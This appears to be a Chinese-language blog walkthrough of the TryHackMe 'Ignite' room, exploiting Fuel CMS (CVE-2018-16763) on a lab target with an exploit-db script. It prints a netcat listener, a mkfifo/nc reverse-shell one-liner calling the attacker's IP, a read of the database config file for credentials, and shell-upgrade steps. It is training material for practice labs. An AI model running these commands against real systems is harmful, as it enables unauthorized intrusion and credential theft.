前言
房间地址:https://tryhackme.com/room/ignite
一家新成立的公司的网络服务器存在一些问题。
此次我将用Parror hack系统作为攻击机器
实战
靶机地址:10.10.178.214
先给咱的系统升一下root
吐槽一下Thm的VPN 有点拉胯
说明咱们连接不上他们的内网VPN
后来修了修,连上了好了我们开扫
开放了80端口
查看源代码
先登录上再说
可以看见直接文件上传漏洞 在上传之前我们先搜索一下Fuel CMS的漏洞
刚用Parror没有搜到Fuel CMS的漏洞 就用kali搜
漏洞其实还不少… 不过在此使用他们的漏洞我觉得不如自己上传shell
这里看到我们准备的shell 是不行的 所以我们只能用漏洞库的脚本shell了
这里看看他们的用法
在这里试一下 不过我们还是去kali或者parror那里去运行脚本
这里我更换了一个靶机地址:因为老是断 服了
我一怒之下给我的kali和parror都上了”魔法”
我们继续:分析一下脚本的使用方法
使用脚本:
python3 50477.py -u http://10.10.234.58
开启监听:
nc -nlvp 6666
反弹shell:
nc后面是自己的攻击地址
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.2.92.117 6666 >/tmp/f
不好意思这Thm靶场老断打一次靶场能断十几次 昨天因为这个老断我就没打,等我订阅结束之后就不打Thm打HTB了
先拿一个flag再说
刚才连接又断了
不过再次连接上我们在看一下根目录
根据开头的提示
database中数据库泄露 当然这也是CVE-2018-16763的一个漏洞
没有对用户的查看权限进行过滤 这时候我们就可以查看他数据库
cat /var/www/html/fuel/application/config/database.php
我们su root切换到root账户提示
必须来自一个终端环境
那我们就创建,这个在我之前博客里面有讲解,加固shell创建终端环境
export TERM=xterm
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo ; fg
reset
回车 输入刚才数据库泄露的密码
OK让拿root.txt
等订阅过期就打HTB了 本来能秒的 VPN一直断打不了一点,上代理都掉,这次大概断了十几次
暂无评论内容